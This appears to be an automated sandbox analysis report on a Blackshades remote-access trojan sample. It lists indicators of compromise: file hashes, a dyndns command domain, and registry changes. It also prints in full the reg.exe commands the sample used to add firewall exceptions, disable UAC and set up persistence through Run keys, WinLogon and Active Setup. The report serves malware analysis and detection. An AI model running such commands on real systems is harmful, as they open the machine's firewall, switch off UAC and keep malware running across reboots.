cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 sn0.dyndns.biz udp

Files

memory/2824-0-0x0000000000400000-0x00000000005A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat

MD5 9fcec2a4ee61953e0d4867261a39ea32
SHA1 d552acf26d9fcc31a9da82ecce503b16a11e9d2a
SHA256 24c5da914d1f429c07ef17dfb7d4d0c90eb060e5a9bd009963fba83b1dd6cae3
SHA512 57d8a88138645780357a88658f21f833efa0ba657dd1fefa6458ba930731e1949216b518f26ab995241837bc7e6eff90b46e5cb5ec34364d2f89db09779e5564

C:\Users\Admin\AppData\Local\Temp\dQcxh.bat

MD5 5d73853d695283e13b412c88ec62984c
SHA1 672379399a80a746a8f0d8043bbf98956101d0ca
SHA256 59884297b763a498c1f55e4ba57f04597ab37677feb9b686839e7553942cf335
SHA512 9043d02ec14cc4869cc8c01562838c11448e2bff42af32ec0a60de76fa8915c3a3a50529ce567c6cb93d2691525b38862257993674c263ed25f6625e370cb2d2

C:\Users\Admin\AppData\Local\Temp\POzYI.bat

MD5 3d470539cbafa762cdb72a4635ad553d
SHA1 4bda3e7de91052dc7d073d8b278ad09ad0d10fa6
SHA256 9f0571e3567d7e1849c7bd5dd7b7a2be942ec44aea6c8bb32d415874b7282691
SHA512 42b168fabd5ddd175ccd143d4f9338880aad03eb22d07fb8a2e13f387015b9eb1d23307bff3ae370c95a5644c88c5e9f7c8b12b332b595c79be069ffc92a448e

C:\Users\Admin\AppData\Local\Temp\aptNl.bat

MD5 09d67635a7674b12183c3f0668ce0cd1
SHA1 c3fe2225cc5198a1c33df0342a95528c2e657a6d
SHA256 972e896e8649a5d2caf286a0d75db99909587b1d2f4683870207b547c3bc02d9
SHA512 b37bdad4fb0e9ab947ea5750337de073907d31156d0d00a1a79392741ced2d1aabf1cc2d92581d7f068266f82cd5b2c10fd7e5c573044e6ce77dea6da6dde321

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

MD5 ed106f486372d55c7c33b101e2454f79
SHA1 34e24c2fc51bdb222808e6175e8eff051ca8d079
SHA256 1ae94a94136049727b7dbea1b28327d941f1193a5abec2ba61df4fd99f107413
SHA512 d54f5b1710b7464e8cc17d7f4cb5219aaa9437fea71204fdb00b4427f3f3b7c8b45c678dfc403e23ba65d4d071bf2f99ecb4edc664c800d5f16c214f6b1109d3

memory/2440-99-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1880-110-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1880-107-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1880-105-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2440-104-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-103-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-118-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1880-119-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2440-122-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-124-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-127-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-129-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-131-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-133-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-137-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-141-0x0000000000400000-0x000000000045C000-memory.dmp

memory/2440-143-0x0000000000400000-0x000000000045C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-04 23:36

Reported

2025-02-04 23:39

Platform

win10v2004-20250129-en

Max time kernel

149s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

Signatures

Blackshades

rat blackshades

Blackshades family

blackshades

Blackshades payload

Description Indicator Process Target
N/A N/A N/A N/A

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe, C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A

Modifies firewall policy service

defense_evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files (x86)\Internet Explorer\Ieupdate.exe = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Users\Admin\AppData\Roaming\vb6.exe = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe:*:Enabled:Windows Messanger" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List C:\Windows\SysWOW64\reg.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3}\StubPath = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Active Setup\Installed Components\{EAFF07AB-FA6F-2EBB-4DBF-CDBBEA4DDCE3} C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IeUpdate = "C:\\Program Files (x86)\\Internet Explorer\\Ieupdate.exe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2436272344-4274332273-444425594-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Users\\Admin\\AppData\\Roaming\\vb6.exe" C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Checks whether UAC is enabled

defense_evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3208 set thread context of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 set thread context of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.txt C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File created C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
File opened for modification C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: 1 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemtimePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeBackupPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeAuditPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeUndockPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeManageVolumePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeImpersonatePrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 31 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 32 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 33 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 34 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: 35 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4596 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 540 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2496 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 4756 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4756 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4756 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4756 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 4596 wrote to memory of 880 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Windows\SysWOW64\cmd.exe
PID 880 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 880 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 880 wrote to memory of 4952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4596 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 4596 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 4596 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 1292 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 3208 wrote to memory of 4768 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Program Files (x86)\Internet Explorer\Ieupdate.exe
PID 1292 wrote to memory of 2672 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2672 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2672 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 1980 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 1980 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 1980 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2376 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2376 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2376 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2056 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2056 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 1292 wrote to memory of 2056 N/A C:\Program Files (x86)\Internet Explorer\Ieupdate.exe C:\Windows\SysWOW64\cmd.exe
PID 2056 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
